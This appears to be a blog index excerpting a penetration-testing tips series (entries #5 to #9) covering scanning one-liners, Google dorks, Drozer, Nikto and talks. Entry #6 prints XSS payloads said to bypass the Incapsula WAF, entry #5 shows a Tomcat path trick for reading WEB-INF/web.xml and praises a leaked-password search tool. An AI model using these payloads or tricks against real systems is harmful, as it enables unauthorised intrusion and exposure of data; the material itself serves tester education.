Technique, Tool and Lecture #9

Technique: Basic one liner to clean masscan output cat masscan-output | cut -d ' ' -f4,6 This will return something like this Tool: Drozer - https://labs.f-secure.com/tools/drozer/ Awesome extensive attack framework for Android Apps (Must have) Lecture: Not super technical but very interesting Ochko123 - How the Feds Caught Russian Mega-Carder Roman Seleznev https://www.youtube.com/watch?v=6Chp12sEnWk&t=784s Check out … Continue reading Technique, Tool and Lecture #9

Technique, Tool and Lecture #8

Technique: One line dash loop for running CLI tools on Kali for IP in $(cat ~/Desktop/target); do nikto -host $IP >> ~/Desktop/nitko-output; done; Tool: Nikto Lecture: Drinking from the caffeine firehose we know as shodan   https://www.youtube.com/watch?v=5cWck_xcH64   Check out all the entries of this series! Technique Tool and Lecture #14 Technique Tool and Lecture … Continue reading Technique, Tool and Lecture #8

Technique, Tool and Lecture #7

Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets but then can use * for the right. For example if I'm looking for data on 103.10.1.1/16 I can do site:103.10.* or site:103.10.*.* Remember * aren't wildcards but they are as close as you'll get. Also remember that … Continue reading Technique, Tool and Lecture #7

Technique, Tool and Lecture #6

Hi Guys, Time some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep then in my bag <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: … Continue reading Technique, Tool and Lecture #6

Technique, Tool and Lecture #5

Technique: Quick and Easy Bypass for Tomcat 8 on Windows https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK Haven't had a chance to use this yet, but I'm sure I will soon Source Tool: Karma So awesome! Lets you search by username, domain or password. For example I can search by … Continue reading Technique, Tool and Lecture #5